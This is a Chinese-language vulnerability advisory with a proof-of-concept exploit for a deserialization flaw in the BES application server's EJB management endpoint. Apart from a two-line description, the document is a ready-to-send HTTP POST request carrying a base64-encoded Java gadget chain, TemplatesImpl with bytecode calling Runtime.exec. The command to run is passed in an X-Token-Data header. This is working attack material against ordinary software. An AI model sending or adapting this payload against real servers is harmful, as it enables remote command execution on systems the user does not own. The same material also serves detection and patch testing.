漏洞描述
宝兰德 BES 管理控制台 /__bes/__ejb 路径存在反序列化漏洞,内部的反序列化黑名单可能被绕过,导致远程命令执行或远程代码执行漏洞
宝兰德 BES 管理控制台 EJB 协议反序列化漏洞
PoC代码
POST /BesEJB/spark HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Token-Data: echo test
{{base64decode(U3BhcmsAAAAAZAAACToHAQk2rO0ABXNyAC9jb20uYmVzLm9yZy5tb3ppbGxhLmphdmFzY3JpcHQuTmF0aXZlSmF2YU9iamVjdJ+RpZ41xDHhAwACTAAGcGFyZW50dAArTGNvbS9iZXMvb3JnL21vemlsbGEvamF2YXNjcmlwdC9TY3JpcHRhYmxlO0wACXByb3RvdHlwZXEAfgABeHBzcgAqY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0Lk5hdGl2ZUFycmF5Zb4/UFXbfGoCAAJKAAZsZW5ndGhbAAVkZW5zZXQAE1tMamF2YS9sYW5nL09iamVjdDt4cgAxY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0LklkU2NyaXB0YWJsZU9iamVjdJIeuSCQhumRAwAAeHIAL2NvbS5iZXMub3JnLm1vemlsbGEuamF2YXNjcmlwdC5TY3JpcHRhYmxlT2JqZWN0d9wV+NjQANEDAANJAAVjb3VudEwAEXBhcmVudFNjb3BlT2JqZWN0cQB+AAFMAA9wcm90b3R5cGVPYmplY3RxAH4AAXhwAAAAAHBwdwQAAAAAeHcEAAAAAHgAAAAAAAAACnVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAApzcgAoY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0LlVuaXF1ZVRhZ8QKTHUXyeaVAgABSQAFdGFnSWR4cAAAAAFxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtwdwEBdAAQamF2YS5sYW5nLk9iamVjdHVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAABzcgAuY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0Lk5hdGl2ZUphdmFBcnJhefMtNmHvePE7AgAESQAGbGVuZ3RoTAAFYXJyYXl0ABJMamF2YS9sYW5nL09iamVjdDtMAANjbHN0ABFMamF2YS9sYW5nL0NsYXNzO0wACXByb3RvdHlwZXEAfgABeHEAfgAAcQB+AAdzcQB+AAMAAAABc3EAfgAAcQB+AAdwdwEBcQB+AAx1cQB+AA0AAAAAc3EAfgADAAAAAXBwdwQAAAAFc3IAOmNvbS5iZXMub3JnLm1vemlsbGEuamF2YXNjcmlwdC5TY3JpcHRhYmxlT2JqZWN0JEdldHRlclNsb3S7/akjcyAdbAIAAkwABmdldHRlcnEAfgAQTAAGc2V0dGVycQB+ABB4cgA0Y29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0LlNjcmlwdGFibGVPYmplY3QkU2xvdM7iw0pE1jfWAgAEUwAKYXR0cmlidXRlc0kAC2luZGV4T3JIYXNoTAAEbmFtZXQAEkxqYXZhL2xhbmcvU3RyaW5nO0wABXZhbHVlcQB+ABB4cAAAAAGMxnQAA2Zvb3BzcgAoY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0Lk1lbWJlckJveFg+G+YG4wS1AwAAeHB3AgEBdAAFZW50ZXJ2cgAmY29tLmJlcy5vcmcubW96aWxsYS5qYXZhc2NyaXB0LkNvbnRleHQAAAAAAAAAAAAAAHhwdwIAAHhweHcEAAAAAHgAAAAAAAAACnVxAH4ACAAAAApxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtxAH4AC3B4cHcEAAAABXNxAH4AGAAAzMn1FHQAEG91dHB1dFByb3BlcnRpZXNweHcEAAAAAHgAAAAAAAAACnVxAH4ACAAAAApxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtxAH4AC3EAfgALcQB+AAtxAH4AC3cBAHNyADpjb20uc3VuLm9yZy5hcGFjaGUueGFsYW4uaW50ZXJuYWwueHNsdGMudHJheC5UZW1wbGF0ZXNJbXBsCVdPwW6sqzMDAAZJAA1faW5kZW50TnVtYmVySQAOX3RyYW5zbGV0SW5kZXhbAApfYnl0ZWNvZGVzdAADW1tCWwAGX2NsYXNzdAASW0xqYXZhL2xhbmcvQ2xhc3M7TAAFX25hbWVxAH4AGUwAEV9vdXRwdXRQcm9wZXJ0aWVzdAAWTGphdmEvdXRpbC9Qcm9wZXJ0aWVzO3hwAAAAAAAAAAB1cgADW1tCS/0ZFWdn2zcCAAB4cAAAAAJ1cgACW0Ks8xf4BghU4AIAAHhwAAABS8r+ur4AAAAxABgBACRvcmcvYXBhY2hlL21hdmVuL3BhcnNlci9ub2RlL0FTVFRydWUHAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAGPGluaXQ+AQADKClWAQAEQ29kZQwABQAGCgAEAAgBABFqYXZhL2xhbmcvUnVudGltZQcACgEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAAwADQoACwAOAQAACAAQAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAEgATCgALABQBAApTb3VyY2VGaWxlAQAMQVNUVHJ1ZS5qYXZhACEAAgAEAAAAAAABAAEABQAGAAEABwAAABoAAgABAAAADiq3AAm4AA8SEbYAFVexAAAAAAABABYAAAACABd1cQB+ACwAAAENyv66vgAAADcAEQEALm9yZy9hcGFjaGUvbXlmYWNlcy9tYXZlbi9tb2RlbC9QbHVnaW5FeGVjdXRpb24HAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEAFFBsdWdpbkV4ZWN1dGlvbi5qYXZhAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoFceZp7jxtRxgBAA1Db25zdGFudFZhbHVlAQAGPGluaXQ+AQADKClWDAAMAA0KAAQADgEABENvZGUAIQACAAQAAAABABoABwAIAAEACwAAAAIACQABAAEADAANAAEAEAAAABEAAQABAAAABSq3AA+xAAAAAAABAAUAAAACAAZwdAABYXB3AQB4cHgAAAAAcHBxAH4AE3B4)}}